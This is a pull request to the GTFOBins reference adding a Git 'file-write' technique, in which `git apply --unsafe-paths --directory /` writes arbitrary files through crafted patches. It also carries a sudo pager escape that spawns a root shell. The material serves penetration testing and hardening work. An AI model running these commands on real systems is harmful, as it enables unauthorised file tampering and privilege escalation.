### PR TITLE
Add file-write to Git

### DIFF
--- a/_gtfobins/git.md
+++ b/_gtfobins/git.md
@@ -27,8 +27,7 @@ functions:
         LFILE=file_to_read
         git diff /dev/null $LFILE
   file-write:
-    - description: Git apply writes to files specified in the patch when supplied with a directory and the flag `--unsafe-paths`. Patch file must be in the valid format. 
-    - description: This creates a new file with two lines.
+    - description: Git apply writes to files specified in the patch when supplied with a directory and the flag `--unsafe-paths`. Patch file must be in the valid format. This creates a new file with two lines.
       code: |
         TF=$(mktemp -d)
         LFILE=file_to_write

--- a/_gtfobins/git.md
+++ b/_gtfobins/git.md
@@ -27,30 +27,9 @@ functions:
         LFILE=file_to_read
         git diff /dev/null $LFILE
   file-write:
-    - description: Git apply writes to files specified in the patch when supplied with a directory and the flag `--unsafe-paths`. Patch file must be in the valid format. This creates a new file with two lines.
+    - description: The patch can be created locally by creating the file that will be written on the target using its absolute path, then `git diff /dev/null /path/to/file >x.patch`.
       code: |
-        TF=$(mktemp -d)
-        LFILE=file_to_write
-        echo "--- /dev/null" > "$TF/temp.patch"
-        echo "+++ b$LFILE" >> "$TF/temp.patch"
-        echo "@@ -0,0 +1,2 @@" >> "$TF/temp.patch"
-        echo "+ line_1_content" >> "$TF/temp.patch"
-        echo "+ line_2_content" >> "$TF/temp.patch"
-        git apply "$TF/temp.patch" --directory / --unsafe-paths
-    - description: This removes a line from an existing file and adds a new line.
-      code: |
-        TF=$(mktemp -d)
-        LFILE=file_to_write
-        echo "--- a$LFILE" > "$TF/temp.patch"
-        echo "+++ b$LFILE" >> "$TF/temp.patch"
-        echo "@@ -1,4 +1,4 @@" >> "$TF/temp.patch"
-        echo " this is a test" >> "$TF/temp.patch"
-        echo " with multiple lines" >> "$TF/temp.patch"
-        echo "-this line will be removed" >> "$TF/temp.patch"
-        echo " this line will have another after" >> "$TF/temp.patch"
-        echo "+a new line" >> "$TF/temp.patch"
-        git apply "$TF/temp.patch" --directory / --unsafe-paths
-        
+        git apply --unsafe-paths --directory / x.patch
   sudo:
     - code: sudo PAGER='sh -c "exec sh 0<&1"' git -p help
     - description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.

--- a/_gtfobins/git.md
+++ b/_gtfobins/git.md
@@ -26,6 +26,32 @@ functions:
       code: |
         LFILE=file_to_read
         git diff /dev/null $LFILE
+  file-write:
+    - description: Git apply writes to files specified in the patch when supplied with a directory and the flag `--unsafe-paths`. Patch file must be in the valid format. 
+    - description: This creates a new file with two lines.
+      code: |
+        TF=$(mktemp -d)
+        LFILE=file_to_write
+        echo "--- /dev/null" > "$TF/temp.patch"
+        echo "+++ b$LFILE" >> "$TF/temp.patch"
+        echo "@@ -0,0 +1,2 @@" >> "$TF/temp.patch"
+        echo "+ line_1_content" >> "$TF/temp.patch"
+        echo "+ line_2_content" >> "$TF/temp.patch"
+        git apply "$TF/temp.patch" --directory / --unsafe-paths
+    - description: This removes a line from an existing file and adds a new line.
+      code: |
+        TF=$(mktemp -d)
+        LFILE=file_to_write
+        echo "--- a$LFILE" > "$TF/temp.patch"
+        echo "+++ b$LFILE" >> "$TF/temp.patch"
+        echo "@@ -1,4 +1,4 @@" >> "$TF/temp.patch"
+        echo " this is a test" >> "$TF/temp.patch"
+        echo " with multiple lines" >> "$TF/temp.patch"
+        echo "-this line will be removed" >> "$TF/temp.patch"
+        echo " this line will have another after" >> "$TF/temp.patch"
+        echo "+a new line" >> "$TF/temp.patch"
+        git apply "$TF/temp.patch" --directory / --unsafe-paths
+        
   sudo:
     - code: sudo PAGER='sh -c "exec sh 0<&1"' git -p help
     - description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.


### PR DESCRIPTION
Git can be used to arbitrarily create, write, or modify files using `git apply` with a valid patch file and the `--unsafe-paths` flag.